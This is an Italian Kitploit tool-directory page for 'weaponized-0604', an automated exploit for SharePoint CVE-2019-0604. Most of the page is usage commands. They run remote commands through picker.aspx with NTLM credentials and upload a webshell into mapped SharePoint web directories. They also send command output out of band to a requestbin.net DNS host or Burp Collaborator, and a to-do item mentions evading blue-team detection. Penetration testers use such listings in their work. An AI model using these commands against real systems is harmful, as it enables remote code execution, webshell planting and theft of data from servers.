Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
weaponized-0604 — Strumento automatizzato per sfruttare SharePoint CVE-2019-0604 | Kitploit
Strumenti/GitHubGitHub/gh0st0ne/weaponized-0604
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubgh0st0ne/weaponized-0604

weaponized-0604

Strumento automatizzato per sfruttare SharePoint CVE-2019-0604

Vedi Repository
815 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-0604 Armato

Strumento di exploit automatizzato per massimizzare CVE-2019-0604.

Requisiti

Il file requirements.txt dovrebbe elencare tutte le librerie Python utilizzate da questo strumento, e verranno installate usando

root@kitploit:~
$ pip install -r requirements.txt

Exploit manuale alla cieca (con o senza credenziali)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>

Funzione di upload

carica qualsiasi cosa interessante (webshell, strumento di ricognizione ...)

root@kitploit:~
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx

Mapping delle directory

root@kitploit:~
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/

Usa OOB per ottenere il risultato del comando

Con l'estensione Burp collaborator_http_api

  1. Installa collaborator_http_api.py in BurpSuite (Pro)?

  2. Assicurati che BurpSuite sia in esecuzione sulla stessa macchina di questo exploit.

  3. Esegui, goditi l'output recuperato :)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

sharepoint-rce-oob-demo

Con DNSLog ad esempio requestbin.net

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"

Ottieni dati dal DNS

root@kitploit:~
2050524956494c4547455320494e464f524d4154494f4e
...

Decodifica da solo :)

root@kitploit:~
 PRIVILEGES INFORMATION
...

TODO

  • Parser degli argomenti
  • SharePoint, CVE-2019-0604
  • suddividere cmd in più parti (in args.cmds)
  • specifica binario su richiesta, evitando il rilevamento da parte del blue team. (attualmente cmd.exe hardcoded)

Autore

  • Tree
Scarica lo strumento